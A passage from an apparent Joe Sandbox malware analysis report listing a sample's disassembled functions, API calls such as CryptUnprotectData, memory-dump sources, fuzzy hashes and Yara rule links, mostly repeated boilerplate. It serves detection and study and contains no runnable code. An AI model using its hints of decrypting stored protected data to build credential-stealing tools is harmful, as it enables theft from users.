                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: O.$OL|W$a;]w
                            • API String ID: 0-2161251978
                            • Opcode ID: 227555393ef05aa7783c6719b4b03c26f9147035a5542ecd461763aa90dfda80
                            • Instruction ID: 779372869f0e9da606d8257288160c0644265013479821b5bdace99cfa4dd3e0
                            • Opcode Fuzzy Hash: 227555393ef05aa7783c6719b4b03c26f9147035a5542ecd461763aa90dfda80
                            • Instruction Fuzzy Hash: 56B2D2F39082049FE304AE29EC8566AFBE9EF94720F16893DE6C5C3744E63598418797
                            Function 00144040 Relevance: 4.6, APIs: 3, Instructions: 124stringtimeCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00144075
                            • lstrcpy.KERNEL32(00000000,013FA5B0), ref: 0014409F
                            • GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0012134E,?,0000001A), ref: 001440A9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$SystemTime
                            • String ID:
                            • API String ID: 684065273-0
                            • Opcode ID: 51be082db025e95e07c8e372b259091c9ed8f8edcce814e99ab0553828cd4d8f
                            • Instruction ID: 145619c993c19f10642de87a41055034d46cdc71f84774e157fab9f0054990c8
                            • Opcode Fuzzy Hash: 51be082db025e95e07c8e372b259091c9ed8f8edcce814e99ab0553828cd4d8f
                            • Instruction Fuzzy Hash: 72416D74A013169FDB15CF25C884B66BBE8FF19315F0984AAE849DB271C775EC82CB80
                            Function 0013CCD0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(0014B118,00000000,00000001,0014B108,?), ref: 0013CCF6
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0013CD36
                            • lstrcpyn.KERNEL32(?,?,00000104), ref: 0013CDB9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                            • String ID:
                            • API String ID: 1940255200-0
                            • Opcode ID: 0d8abbafb7816288cb736c35c1892716b0e85e9ed0c23841f9c12e0dc5f688ef
                            • Instruction ID: 0fa3252deb94eb0cc56100f813b628b8c4f389c73023447dbe0344e6b830db85
                            • Opcode Fuzzy Hash: 0d8abbafb7816288cb736c35c1892716b0e85e9ed0c23841f9c12e0dc5f688ef
                            • Instruction Fuzzy Hash: 4E314471A40615AFDB10DB94CC91FE9B7B99B88B11F104194FA14EB2D0D7B1AE45CBD0
                            Function 00129B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00129B9F
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00129BB3
                            • LocalFree.KERNEL32(?), ref: 00129BD7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: ca1d3424711e47fcca8b9daf3efbba9a7fd8e260dbc6749ab051bf2e55ca030b
                            • Instruction ID: 056efac1513ada2628908b5106fedea7637b2079fc547f7f103c99200b2c8060
                            • Opcode Fuzzy Hash: ca1d3424711e47fcca8b9daf3efbba9a7fd8e260dbc6749ab051bf2e55ca030b
                            • Instruction Fuzzy Hash: 09011DB5E41319ABE7109BA8DC45FAFB77CEB48B01F104555EA04AB280D7B49A10CBE1
                            Function 004DC4A5 Relevance: 4.1, Strings: 2, Instructions: 1631COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: LU/$dr?{
                            • API String ID: 0-4254118748
                            • Opcode ID: 0c2ebfb021ab239ab62bff69b21781c88c09b47140d987bb1df60f9d6fd2c40b
                            • Instruction ID: 2e784ba64990d86e97d262b17f0540ca767bed9b283ee5017fab8dd90bb0f5f1
                            • Opcode Fuzzy Hash: 0c2ebfb021ab239ab62bff69b21781c88c09b47140d987bb1df60f9d6fd2c40b
                            • Instruction Fuzzy Hash: CDB207F3A0C210AFE3046E2DEC8567ABBE9EFD4720F1A453DE6C4C7744EA3558058696
                            Function 004E1D18 Relevance: 2.2, Strings: 1, Instructions: 919COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .?
                            • API String ID: 0-2522436520
                            • Opcode ID: 69daacdc8ce96dea9d6c4e5053325d87228643eadd9526029290d236abff8dec
                            • Instruction ID: 55f69025ca13ec034869d50006e3e763bd2ae323ea351d974da985af83330f3d
                            • Opcode Fuzzy Hash: 69daacdc8ce96dea9d6c4e5053325d87228643eadd9526029290d236abff8dec
                            • Instruction Fuzzy Hash: AC5206F3A0C200AFE7056E2DDC457BABBE9EF94320F1A492DE6C4C7744E63598058697
                            Function 00451C1E Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: F\{_
                            • API String ID: 0-3447907185
                            • Opcode ID: f28cfb7bd64d7f91936a9b15198ff5ca30be0761a055c608686b9594f00f14ca
                            • Instruction ID: b1c945b0779fcba2703a33032ddba467a8f5a54c49cf3ac1e254f90ed0913b61
                            • Opcode Fuzzy Hash: f28cfb7bd64d7f91936a9b15198ff5ca30be0761a055c608686b9594f00f14ca
                            • Instruction Fuzzy Hash: 0671F8F3A086049FE314BE29DC8577AF7E5EF94310F1A853DDAC483744F97559018686
                            Function 00433613 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: e]y
                            • API String ID: 0-299156766
                            • Opcode ID: 1e153639b347cbfa108de0a5150fecce77c4c6a4fe02330a77560faee8c8b53f
                            • Instruction ID: 01fbf889e27622c8fe4ee1514edd9afa68dd83fc1948c14e102d00314656b2fc
                            • Opcode Fuzzy Hash: 1e153639b347cbfa108de0a5150fecce77c4c6a4fe02330a77560faee8c8b53f
                            • Instruction Fuzzy Hash: 856116F3A083085FF3106E29EDC977ABBD9EB94314F1A853DEBC483744E93558098646
                            Function 005E6FF7 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: T1C@
                            • API String ID: 0-3976893720
                            • Opcode ID: 373b2b20d8775a3c2116cf57879c4743939f296d1cb635f7b26e82ab4621ce71
                            • Instruction ID: be1addab9a23b5d4b545c63f36da01ba87c6c7a3143a611f2dc2710f1e13da42
                            • Opcode Fuzzy Hash: 373b2b20d8775a3c2116cf57879c4743939f296d1cb635f7b26e82ab4621ce71
                            • Instruction Fuzzy Hash: 064179E321C34DDFD30C5D2AECC863B7F85E788390F354A3EE6C28A744E62594459616
                            Function 0056E463 Relevance: .2, Instructions: 239COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 84ab0bd71e3c3dbc9d21e71627b219ac7e1a747c6c80b011b207c98603b1d9fa
                            • Instruction ID: c189ba76f912f0af786a770a0e7d1185ab6f0a209e801dce124da18d03540ce0
                            • Opcode Fuzzy Hash: 84ab0bd71e3c3dbc9d21e71627b219ac7e1a747c6c80b011b207c98603b1d9fa
                            • Instruction Fuzzy Hash: CF71C2BA60E640DFD3086E28EC8663EBFE8FB94714F254D2DE6C787244EA705841D647
                            Function 005698C7 Relevance: .2, Instructions: 228COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7fcd1dbe271baf18a93a0c075b368aebd7e7d42a6b53f3805a27d0d668b9ab89
                            • Instruction ID: 1020e44f5dc17495d3b5f8f34c7bbe5840f8e89f3bff26b1a494fc2c6c2376ca
                            • Opcode Fuzzy Hash: 7fcd1dbe271baf18a93a0c075b368aebd7e7d42a6b53f3805a27d0d668b9ab89
                            • Instruction Fuzzy Hash: 1671D2B250C600DFE705AF29DD41A7EBBE9FB98320F12493DE6CA83344E63558518B93
                            Function 0044D55E Relevance: .2, Instructions: 207COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
